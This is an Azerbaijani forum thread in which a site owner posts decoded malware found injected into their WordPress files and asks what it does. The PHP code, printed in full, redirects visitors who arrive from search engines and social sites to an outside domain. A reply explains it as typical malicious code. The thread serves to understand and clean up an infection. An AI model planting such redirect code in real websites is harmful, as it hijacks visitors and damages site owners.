Saytdakı bütün wp fayllarında, ən azı 20 dəfə əlavə mətni (malware virusu) tapdım base64 kodlaşması ilə decode olunmuşdu. convert elədim utf-8-ə, aşağıdakı kodlaşma alındı. Kodun açılışı ilə bağlı kömək etmənizi xahiş edirəm.
error_reporting(0);
$qazplm=headers_sent();
if (!$qazplm){
$referer=$_SERVER['HTTP_REFERER'];
$uag=$_SERVER['HTTP_USER_AGENT'];
if ($uag) {
if (stristr($referer,"yahoo") or stristr($referer,"bing") or stristr($referer,"rambler") or stristr($referer,"gogo") or stristr($referer,"live.com")or stristr($referer,"aport") or stristr($referer,"nigma") or stristr($referer,"webalta") or stristr($referer,"begun.ru") or stristr($referer,"stumbleupon.com") or stristr($referer,"bit.ly") or stristr($referer,"tinyurl.com") or preg_match("/yandex\.ru\/yandsearch\?(.*?)\&lr\=/",$referer) or preg_match ("/google\.(.*?)\/url/",$referer) or stristr($referer,"myspace.com") or stristr($referer,"facebook.com") or stristr($referer,"aol.com")) {
if (!stristr($referer,"cache") or !stristr($referer,"inurl")){
header("Location: http://namesti.bee.pl/");
exit();
}
}
}
}
Verilmiş cavablar və yazılan şərhlər (2 cavab var)
0
Bu kodun açması budur ki, kod yoxlayır ki əgər saytınıza keçid adları çəkilən axtarış və servis saytlarından olubsa, o halda saytı yönləndirir namesti.bee.pl adlı sayta. Yəni istifadəçi sizin saytı Google-da tapırsa və üstünə klik edirsə saytınız anındaca yönlənir yuxarıda adını çəkdiyim sayta, və istifadəçi sizin sayt əvəzinə o sayta düşmüş olur. Tipik zərərli koddur.
0
Aha başa düşdüm, təşəkkür edirəm. Hostingin support xidmətinə yazıram deyirlər biz sizin faylları yoxlayırıq heç bir zərərli bir şey yoxdu. Axırı onlara screenshoot edib göndərmişəm sonra başa düşüblər vəziyyəti.
Sual verin
Cavab verin